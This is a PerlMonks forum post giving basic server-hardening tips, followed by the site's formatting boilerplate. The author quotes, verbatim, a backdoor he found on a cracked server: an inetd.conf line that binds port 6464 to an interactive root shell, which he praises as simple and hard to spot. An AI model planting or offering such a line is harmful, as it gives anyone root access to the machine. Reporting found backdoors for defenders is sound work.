Ive been the person called in to repair dozens of cracked servers. Alot of times, when a box gets cracked its pure laziness.
You should always keep an ear out for security patches. You should always block IPs based on hosts.allow and deny. You should always have MySQLs access tables defined, and not world accessable. Dont allow anyone who isnt trusted telnet/ssh access to your box ( once your in, your good as root ).
Doing this prevents the script kiddies from getting in your box, But this will not prevent a REAL cracker from accessing your box.
On a side note, I recently was called in to help fix a box and found the following backdoor installed.
in inetd.conf:
6464 stream tcp nowait root /bin/sh sh -i
So simple It was beautiful... a perfect back door that few people would catch.
-pete
Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
Read Where should I post X? if you're not absolutely sure you're posting in the right place.
Please read these before you post! —
Posts may use any of the Perl Monks Approved HTML tags:
- a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
| |
For: |
|
Use: |
| & | | & |
| < | | < |
| > | | > |
| [ | | [ |
| ] | | ] |
Link using PerlMonks shortcuts! What shortcuts can I use for linking?
See Writeup Formatting Tips and other pages linked from there for more info.